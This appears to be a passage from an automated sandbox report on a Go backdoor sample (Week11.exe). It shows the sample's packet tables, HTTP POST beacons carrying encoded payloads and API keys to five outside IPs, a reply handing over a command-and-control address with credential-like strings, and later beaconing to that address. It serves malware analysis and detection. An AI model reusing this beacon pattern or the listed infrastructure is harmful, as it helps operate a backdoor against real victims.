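Run against the constructed log it reports one confirmed session, 94.103.88.127:28670 with client SIDs 2855536 and 2855537 and server SIDs 2855538 and 2855539 between 17:57:20 and 17:57:49, and sets aside the two SID 2022930 hits from 172.202.163.200:443. On a sensor the same `triage_alerts` call works over fast.log directly, or over eve.json alert objects once their fields are flattened to the same keys; the IDS in this report applied the equivalent pairing, which is why the ETPRO alerts and not the ET EXPLOIT ones drive the GO Backdoor verdict.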
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 11, 2024 17:57:14.942672014 CET | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Nov 11, 2024 17:57:14.947714090 CET | 80 | 49704 | 46.8.232.106 | 192.168.2.5
Nov 11, 2024 17:57:14.947854042 CET | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Nov 11, 2024 17:57:14.949439049 CET | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Nov 11, 2024 17:57:14.954346895 CET | 80 | 49704 | 46.8.232.106 | 192.168.2.5
Nov 11, 2024 17:57:15.630495071 CET | 80 | 49704 | 46.8.232.106 | 192.168.2.5
Nov 11, 2024 17:57:15.656373024 CET | 49705 | 80 | 192.168.2.5 | 46.8.236.61
Nov 11, 2024 17:57:15.661288023 CET | 80 | 49705 | 46.8.236.61 | 192.168.2.5
Nov 11, 2024 17:57:15.661420107 CET | 49705 | 80 | 192.168.2.5 | 46.8.236.61
Nov 11, 2024 17:57:15.661811113 CET | 49705 | 80 | 192.168.2.5 | 46.8.236.61
Nov 11, 2024 17:57:15.666580915 CET | 80 | 49705 | 46.8.236.61 | 192.168.2.5
Nov 11, 2024 17:57:15.678107023 CET | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Nov 11, 2024 17:57:16.317673922 CET | 80 | 49705 | 46.8.236.61 | 192.168.2.5
Nov 11, 2024 17:57:16.366842031 CET | 49705 | 80 | 192.168.2.5 | 46.8.236.61
Nov 11, 2024 17:57:16.373636961 CET | 49706 | 80 | 192.168.2.5 | 93.185.159.253
Nov 11, 2024 17:57:16.378559113 CET | 80 | 49706 | 93.185.159.253 | 192.168.2.5
Nov 11, 2024 17:57:16.378653049 CET | 49706 | 80 | 192.168.2.5 | 93.185.159.253
Nov 11, 2024 17:57:16.382776976 CET | 49706 | 80 | 192.168.2.5 | 93.185.159.253
Nov 11, 2024 17:57:16.387643099 CET | 80 | 49706 | 93.185.159.253 | 192.168.2.5
Nov 11, 2024 17:57:17.074347019 CET | 80 | 49706 | 93.185.159.253 | 192.168.2.5
Nov 11, 2024 17:57:17.095859051 CET | 49707 | 80 | 192.168.2.5 | 91.212.166.91
Nov 11, 2024 17:57:17.100907087 CET | 80 | 49707 | 91.212.166.91 | 192.168.2.5
Nov 11, 2024 17:57:17.101011038 CET | 49707 | 80 | 192.168.2.5 | 91.212.166.91
Nov 11, 2024 17:57:17.102101088 CET | 49707 | 80 | 192.168.2.5 | 91.212.166.91
Nov 11, 2024 17:57:17.107034922 CET | 80 | 49707 | 91.212.166.91 | 192.168.2.5
Nov 11, 2024 17:57:17.117932081 CET | 49706 | 80 | 192.168.2.5 | 93.185.159.253
Nov 11, 2024 17:57:17.781618118 CET | 80 | 49707 | 91.212.166.91 | 192.168.2.5
Nov 11, 2024 17:57:17.801697016 CET | 49708 | 80 | 192.168.2.5 | 188.130.206.243
Nov 11, 2024 17:57:17.806694031 CET | 80 | 49708 | 188.130.206.243 | 192.168.2.5
Nov 11, 2024 17:57:17.806770086 CET | 49708 | 80 | 192.168.2.5 | 188.130.206.243
Nov 11, 2024 17:57:17.807096958 CET | 49708 | 80 | 192.168.2.5 | 188.130.206.243
Nov 11, 2024 17:57:17.812374115 CET | 80 | 49708 | 188.130.206.243 | 192.168.2.5
Nov 11, 2024 17:57:17.822992086 CET | 49707 | 80 | 192.168.2.5 | 91.212.166.91
Nov 11, 2024 17:57:19.543759108 CET | 80 | 49708 | 188.130.206.243 | 192.168.2.5
Nov 11, 2024 17:57:19.547219992 CET | 49707 | 80 | 192.168.2.5 | 91.212.166.91
Nov 11, 2024 17:57:19.547256947 CET | 49706 | 80 | 192.168.2.5 | 93.185.159.253
Nov 11, 2024 17:57:19.547266006 CET | 49705 | 80 | 192.168.2.5 | 46.8.236.61
Nov 11, 2024 17:57:19.547307014 CET | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Nov 11, 2024 17:57:19.547557116 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:57:19.553570032 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:57:19.553678036 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:57:19.570066929 CET | 80 | 49708 | 188.130.206.243 | 192.168.2.5
Nov 11, 2024 17:57:19.570173025 CET | 49708 | 80 | 192.168.2.5 | 188.130.206.243
Nov 11, 2024 17:57:19.584469080 CET | 80 | 49707 | 91.212.166.91 | 192.168.2.5
Nov 11, 2024 17:57:19.584518909 CET | 80 | 49706 | 93.185.159.253 | 192.168.2.5
Nov 11, 2024 17:57:19.584531069 CET | 80 | 49705 | 46.8.236.61 | 192.168.2.5
Nov 11, 2024 17:57:19.584544897 CET | 80 | 49704 | 46.8.232.106 | 192.168.2.5
Nov 11, 2024 17:57:19.584578037 CET | 49707 | 80 | 192.168.2.5 | 91.212.166.91
Nov 11, 2024 17:57:19.584610939 CET | 49706 | 80 | 192.168.2.5 | 93.185.159.253
Nov 11, 2024 17:57:19.584626913 CET | 49704 | 80 | 192.168.2.5 | 46.8.232.106
Nov 11, 2024 17:57:19.584621906 CET | 49705 | 80 | 192.168.2.5 | 46.8.236.61
Nov 11, 2024 17:57:20.153842926 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:57:20.154103994 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:57:20.159159899 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:57:35.170234919 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:57:35.175311089 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:57:40.157119036 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:57:40.157536030 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:57:40.162553072 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:57:49.548648119 CET | 49708 | 80 | 192.168.2.5 | 188.130.206.243
Nov 11, 2024 17:57:49.549150944 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:57:49.553416967 CET | 80 | 49708 | 188.130.206.243 | 192.168.2.5
Nov 11, 2024 17:57:49.554022074 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:57:49.784385920 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:57:49.832168102 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:00.365731001 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:00.366110086 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:00.371018887 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:15.382267952 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:15.387249947 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:19.554169893 CET | 49708 | 80 | 192.168.2.5 | 188.130.206.243
Nov 11, 2024 17:58:19.558973074 CET | 80 | 49708 | 188.130.206.243 | 192.168.2.5
Nov 11, 2024 17:58:19.788997889 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:19.793848991 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:20.001281023 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:20.048991919 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:20.583678961 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:20.584033966 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:20.589318991 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:35.600986004 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:35.606076956 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:40.791482925 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:40.791714907 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:40.796587944 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:49.542737007 CET | 49708 | 80 | 192.168.2.5 | 188.130.206.243
Nov 11, 2024 17:58:49.555527925 CET | 80 | 49708 | 188.130.206.243 | 192.168.2.5
Nov 11, 2024 17:58:49.555654049 CET | 49708 | 80 | 192.168.2.5 | 188.130.206.243
Nov 11, 2024 17:58:49.996901989 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:58:50.002541065 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:50.205581903 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:58:50.253335953 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:59:00.999234915 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:59:00.999623060 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:59:01.005156040 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:59:16.015749931 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Nov 11, 2024 17:59:16.021071911 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:59:21.207706928 CET | 28670 | 49709 | 94.103.88.127 | 192.168.2.5
Nov 11, 2024 17:59:21.250046015 CET | 49709 | 28670 | 192.168.2.5 | 94.103.88.127
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 11, 2024 17:57:56.589783907 CET | 53 | 56272 | 162.159.36.2 | 192.168.2.5
Nov 11, 2024 17:57:57.324245930 CET | 53 | 49843 | 1.1.1.1 | 192.168.2.5
                              • 46.8.232.106
                              • 46.8.236.61
                              • 93.185.159.253
                              • 91.212.166.91
                              • 188.130.206.243
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 46.8.232.106 | 80 | 2172 | C:\Users\user\Desktop\Week11.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:57:14.949439049 CET | 334 | OUT | POST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: IvkcbsG4
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
Nov 11, 2024 17:57:15.630495071 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Mon, 11 Nov 2024 16:57:15 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 46.8.236.61 | 80 | 2172 | C:\Users\user\Desktop\Week11.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:57:15.661811113 CET | 333 | OUT | POST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: h1Vcw1Hj
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
Nov 11, 2024 17:57:16.317673922 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Mon, 11 Nov 2024 16:57:16 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49706 | 93.185.159.253 | 80 | 2172 | C:\Users\user\Desktop\Week11.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:57:16.382776976 CET | 336 | OUT | POST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: nR253E4s
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
Nov 11, 2024 17:57:17.074347019 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Mon, 11 Nov 2024 16:57:16 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 91.212.166.91 | 80 | 2172 | C:\Users\user\Desktop\Week11.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:57:17.102101088 CET | 335 | OUT | POST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: SgIe3D6e
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
Nov 11, 2024 17:57:17.781618118 CET | 183 | IN | HTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Mon, 11 Nov 2024 16:57:17 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49708 | 188.130.206.243 | 80 | 2172 | C:\Users\user\Desktop\Week11.exe
Timestamp | Bytes transferred | Direction | Data
Nov 11, 2024 17:57:17.807096958 CET | 337 | OUT | POST / HTTP/1.1
                              Host: 188.130.206.243
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: foR5Iaks
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
Nov 11, 2024 17:57:19.543759108 CET | 554 | IN | HTTP/1.1 200 OK
                              Date: Mon, 11 Nov 2024 16:57:19 GMT
                              Content-Length: 436
                              Content-Type: text/plain; charset=utf-8
                              Data Raw: 39 34 2e 31 30 33 2e 38 38 2e 31 32 37 3b 32 38 36 37 30 3b 68 4e 35 4b 74 5a 74 69 74 42 4b 64 70 44 33 74 3a 33 59 50 2f 52 72 30 2f 7a 57 37 34 39 46 33 36 32 6d 56 2e 68 4b 79 38 43 6c 38 2e 48 32 70 32 4a 43 76 33 55 65 6d 32 35 58 58 2e 42 71 64 31 70 63 47 30 54 76 43 36 39 74 4e 2c 44 75 36 68 66 73 56 74 6d 47 58 74 50 30 50 70 7a 52 7a 3a 50 55 61 2f 64 53 4d 2f 39 30 79 34 64 32 70 36 43 62 42 2e 68 36 59 38 32 42 4b 2e 37 35 47 32 44 76 42 33 47 37 57 36 71 35 31 2e 6d 76 58 36 72 73 34 31 53 6c 67 2c 4e 33 6e 68 39 74 5a 74 44 6f 45 74 71 6f 49 70 6f 67 67 3a 45 6d 74 2f 76 31 38 2f 55 31 47 39 37 57 57 33 6b 70 70 2e 39 77 47 31 33 4f 35 38 36 58 47 35 4a 39 78 2e 37 54 57 31 61 35 43 35 34 4c 4c 39 36 45 74 2e 63 34 57 32 53 38 61 35 7a 39 7a 33 62 67 5a 2c 33 61 67 68 56 6b 35 74 4d 6c 4e 74 6f 5a 36 70 38 63 6e 3a 37 76 51 2f 4f 78 61 2f 78 6a 4c 39 6f 59 45 31 38 57 4c 2e 4c 51 50 32 52 53 75 31 58 35 52 32 62 52 63 2e 31 66 58 31 5a 74 49 36 68 37 41 36 37 6c 49 2e 56 6e 73 39 32 [TRUNCATED]
                              Data Ascii: 94.103.88.127;28670;hN5KtZtitBKdpD3t:3YP/Rr0/zW749F362mV.hKy8Cl8.H2p2JCv3Uem25XX.Bqd1pcG0TvC69tN,Du6hfsVtmGXtP0PpzRz:PUa/dSM/90y4d2p6CbB.h6Y82BK.75G2DvB3G7W6q51.mvX6rs41Slg,N3nh9tZtDoEtqoIpogg:Emt/v18/U1G97WW3kpp.9wG13O586XG5J9x.7TW1a5C54LL96Et.c4W2S8a5z9z3bgZ,3aghVk5tMlNtoZ6p8cn:7vQ/Oxa/xjL9oYE18WL.LQP2RSu1X5R2bRc.1fX1ZtI6h7A67lI.Vns927W1j56,wC8hKvWtHSXtav0pYPO:lsj/2YB/tAG1YeK8YCy8XLE.wOb142r3F9O05Gq.7bA2Bdy0FWU6PnN.PMI2x9d46dY3o0O
Nov 11, 2024 17:57:19.570066929 CET | 554 | IN | HTTP/1.1 200 OK
                              Date: Mon, 11 Nov 2024 16:57:19 GMT
                              Content-Length: 436
                              Content-Type: text/plain; charset=utf-8
                              Data Raw: 39 34 2e 31 30 33 2e 38 38 2e 31 32 37 3b 32 38 36 37 30 3b 68 4e 35 4b 74 5a 74 69 74 42 4b 64 70 44 33 74 3a 33 59 50 2f 52 72 30 2f 7a 57 37 34 39 46 33 36 32 6d 56 2e 68 4b 79 38 43 6c 38 2e 48 32 70 32 4a 43 76 33 55 65 6d 32 35 58 58 2e 42 71 64 31 70 63 47 30 54 76 43 36 39 74 4e 2c 44 75 36 68 66 73 56 74 6d 47 58 74 50 30 50 70 7a 52 7a 3a 50 55 61 2f 64 53 4d 2f 39 30 79 34 64 32 70 36 43 62 42 2e 68 36 59 38 32 42 4b 2e 37 35 47 32 44 76 42 33 47 37 57 36 71 35 31 2e 6d 76 58 36 72 73 34 31 53 6c 67 2c 4e 33 6e 68 39 74 5a 74 44 6f 45 74 71 6f 49 70 6f 67 67 3a 45 6d 74 2f 76 31 38 2f 55 31 47 39 37 57 57 33 6b 70 70 2e 39 77 47 31 33 4f 35 38 36 58 47 35 4a 39 78 2e 37 54 57 31 61 35 43 35 34 4c 4c 39 36 45 74 2e 63 34 57 32 53 38 61 35 7a 39 7a 33 62 67 5a 2c 33 61 67 68 56 6b 35 74 4d 6c 4e 74 6f 5a 36 70 38 63 6e 3a 37 76 51 2f 4f 78 61 2f 78 6a 4c 39 6f 59 45 31 38 57 4c 2e 4c 51 50 32 52 53 75 31 58 35 52 32 62 52 63 2e 31 66 58 31 5a 74 49 36 68 37 41 36 37 6c 49 2e 56 6e 73 39 32 [TRUNCATED]
                              Data Ascii: 94.103.88.127;28670;hN5KtZtitBKdpD3t:3YP/Rr0/zW749F362mV.hKy8Cl8.H2p2JCv3Uem25XX.Bqd1pcG0TvC69tN,Du6hfsVtmGXtP0PpzRz:PUa/dSM/90y4d2p6CbB.h6Y82BK.75G2DvB3G7W6q51.mvX6rs41Slg,N3nh9tZtDoEtqoIpogg:Emt/v18/U1G97WW3kpp.9wG13O586XG5J9x.7TW1a5C54LL96Et.c4W2S8a5z9z3bgZ,3aghVk5tMlNtoZ6p8cn:7vQ/Oxa/xjL9oYE18WL.LQP2RSu1X5R2bRc.1fX1ZtI6h7A67lI.Vns927W1j56,wC8hKvWtHSXtav0pYPO:lsj/2YB/tAG1YeK8YCy8XLE.wOb142r3F9O05Gq.7bA2Bdy0FWU6PnN.PMI2x9d46dY3o0O
Nov 11, 2024 17:57:49.548648119 CET | 6 | OUT | Data Raw: 00
Data Ascii:
Nov 11, 2024 17:58:19.554169893 CET | 6 | OUT | Data Raw: 00
Data Ascii:


Target ID: 0
Start time: 11:57:13
Start date: 11/11/2024
Path: C:\Users\user\Desktop\Week11.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Week11.exe"
Imagebase: 0x400000
File size: 8'848'896 bytes
MD5 hash: 4FBC4F26E90324C3B535943452460761
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: false

                              No disassembly